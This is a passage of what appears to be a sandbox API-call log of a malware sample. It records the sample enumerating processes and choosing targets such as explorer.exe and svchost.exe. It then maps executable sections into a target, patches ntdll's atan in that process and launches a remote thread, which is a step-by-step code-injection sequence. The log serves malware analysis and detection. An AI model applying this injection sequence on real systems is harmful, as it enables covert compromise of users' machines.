(lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0166.651] VirtualQuery (in: lpAddress=0x293b50, lpBuffer=0x10fb10, dwLength=0x30 | out: lpBuffer=0x10fb10*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0166.651] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.651] VirtualQuery (in: lpAddress=0x2937e0, lpBuffer=0x10fa60, dwLength=0x30 | out: lpBuffer=0x10fa60*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0166.651] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0166.651] VirtualQuery (in: lpAddress=0x293b50, lpBuffer=0x10fa60, dwLength=0x30 | out: lpBuffer=0x10fa60*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0166.651] NtCreateSection (in: SectionHandle=0x10fae0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x10fa78, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x10fae0*=0xdc) returned 0x0 [0166.651] NtMapViewOfSection (in: SectionHandle=0xdc, ProcessHandle=0xd8, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x290000, SectionOffset=0x0, ViewSize=0x10fa80*=0xb000) returned 0x0 [0166.652] NtCreateSection (in: SectionHandle=0x10fb58, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x10fa78, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x10fb58*=0xe0) returned 0x0 [0166.652] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xd8, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x2a0000, SectionOffset=0x0, ViewSize=0x10fa80*=0x1000) returned 0x0 [0166.652] NtMapViewOfSection (in: SectionHandle=0xdc, ProcessHandle=0xffffffffffffffff, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0xb000) returned 0x0 [0166.653] RtlMoveMemory (in: Destination=0x61000, Source=0x293f50, Length=0x0 | out: Destination=0x61000) [0166.653] RtlMoveMemory (in: Destination=0x67000, Source=0x293f50, Length=0x2200 | out: Destination=0x67000) [0166.653] RtlMoveMemory (in: Destination=0x6a000, Source=0x296150, Length=0x400 | out: Destination=0x6a000) [0166.653] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0166.653] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0166.653] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0166.653] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0166.653] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0166.654] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0166.654] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0166.654] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0166.654] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0166.654] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0166.654] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0166.654] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0166.655] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0166.655] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0166.655] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0166.655] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0166.655] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0166.655] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0166.655] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60000) returned 0x0 [0166.657] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xffffffffffffffff, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0x1000) returned 0x0 [0166.657] RtlMoveMemory (in: Destination=0x60000, Source=0x544b8, Length=0x23 | out: Destination=0x60000) [0166.657] RtlMoveMemory (in: Destination=0x60023, Source=0x2937e0, Length=0x363 | out: Destination=0x60023) [0166.657] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60023) returned 0x0 [0166.658] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter64") returned 0xe4 [0166.658] GetLastError () returned 0x0 [0166.658] GetModuleHandleA (lpModuleName="ntdll") returned 0x76f50000 [0166.658] GetProcAddress (hModule=0x76f50000, lpProcName="atan") returned 0x76fd9604 [0166.658] ReadProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10fb00, nSize=0xe, lpNumberOfBytesRead=0x10fb68 | out: lpBuffer=0x10fb00*, lpNumberOfBytesRead=0x10fb68*=0xe) returned 1 [0166.658] WriteProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10faf0*, nSize=0xe, lpNumberOfBytesWritten=0x10fb68 | out: lpBuffer=0x10faf0*, lpNumberOfBytesWritten=0x10fb68*=0xe) returned 1 [0166.659] CreateRemoteThread (in: hProcess=0xd8, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x76fd9604, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8 [0166.765] CloseHandle (hObject=0xe8) returned 1 [0166.765] Sleep (dwMilliseconds=0x1f4) [0167.334] WriteProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10fb00*, nSize=0xe, lpNumberOfBytesWritten=0x10fb68 | out: lpBuffer=0x10fb00*, lpNumberOfBytesWritten=0x10fb68*=0xe) returned 1 [0167.335] CloseHandle (hObject=0xe4) returned 1 [0167.335] CloseHandle (hObject=0xe0) returned 1 [0167.335] CloseHandle (hObject=0xdc) returned 1 [0167.335] CloseHandle (hObject=0xd8) returned 1 [0167.335] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0167.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xd8 [0167.336] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0167.336] CloseHandle (hObject=0xd8) returned 1 [0167.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0167.337] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0167.337] CloseHandle (hObject=0xd8) returned 1 [0167.337] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0167.338] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0167.338] CloseHandle (hObject=0xd8) returned 1 [0167.338] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0167.338] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0167.338] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0167.338] CloseHandle (hObject=0xd8) returned 1 [0167.338] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.339] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0167.339] CloseHandle (hObject=0xd4) returned 1 [0167.339] Sleep (dwMilliseconds=0x3e8) [0168.445] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0168.447] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0168.447] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0168.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0168.448] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0168.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0168.448] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0168.449] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0168.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0168.449] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0168.450] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0168.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0168.451] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0168.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0168.451] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0168.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0168.452] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0168.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0168.452] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0168.453] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0168.453] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0168.454] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0168.454] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0168.455] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0168.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0168.455] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0168.456] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0168.456] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0168.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0168.457] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.457] CloseHandle (hObject=0xd8) returned 1 [0168.457] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0168.457] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0168.457] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0168.457] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0168.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0168.458] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0168.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0168.458] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.458] CloseHandle (hObject=0xd8) returned 1 [0168.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0168.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0168.459] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0168.459] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0168.459] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0168.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0168.460] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0168.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0168.460] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.460] CloseHandle (hObject=0xd8) returned 1 [0168.460] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0168.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0168.461] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.461] CloseHandle (hObject=0xd8) returned 1 [0168.461] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0168.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0168.461] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.461] CloseHandle (hObject=0xd8) returned 1 [0168.461] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0168.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0168.462] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.462] CloseHandle (hObject=0xd8) returned 1 [0168.462] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0168.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0168.462] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.463] CloseHandle (hObject=0xd8) returned 1 [0168.463] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0168.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0168.463] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.463] CloseHandle (hObject=0xd8) returned 1 [0168.463] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0168.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0168.464] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.464] CloseHandle (hObject=0xd8) returned 1 [0168.464] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0168.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0168.464] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.464] CloseHandle (hObject=0xd8) returned 1 [0168.464] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0168.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0168.465] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.465] CloseHandle (hObject=0xd8) returned 1 [0168.465] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0168.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0168.467] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0168.467] CloseHandle (hObject=0xd8) returned 1 [0168.467] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 